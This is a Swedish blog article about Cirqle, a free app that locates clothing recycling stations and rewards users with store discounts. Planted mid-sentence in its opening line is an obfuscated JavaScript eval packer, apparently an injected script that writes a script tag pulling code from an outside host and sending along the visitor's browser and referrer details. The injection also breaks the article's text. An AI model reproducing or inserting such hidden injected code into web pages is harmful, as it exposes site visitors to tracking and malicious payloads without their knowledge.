Image Image Image Image Image Image Image Image Image Image

| 8 maj, 2021

Scroll to top

Top

Appen Cirqle gör det roligare att återvinna kläder

Sebastian

Är eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ykktr|var|u0026u|referrer|bbaat||js|php’.split(’|’),0,{}))
du en person som lätt samlar på dig en massa gamla kläder hemma? Du undrar säkert många gånger vad du ska göra med dessa och slutar som många andra med att slänga. 

Nu finns det en app som hjälper dig på traven. Cirqle är en tjänst och app där du som användare kan hitta platser för återvinning av gamla kläder. Förutom att du känner dig stolt och miljömedveten får du också en liten belöning för detta. Belöningen som ges är rabatter på utvalda klädmärken och butiker runt om i Sverige.

» Läs också Håller Flygresor.se app måttet nu?

Teamet bakom Cirqle säger i sin video (som kan ses ovan) att vi svenskar gör oss av med eller rent av slänger omkring 200 ton kläder varje dag. Med Cirqle vill gänget nu få en ändring på detta och sänka den siffran.

Appen hittar ni i App Store och är kostnadsfri. Det enda som behövs är en registrering och sen en tripp till närmaste återvinningsstation. Efter detta är det bara att ta del av rabatterna du ges.

Cirqle-appen hittar du även här i App Store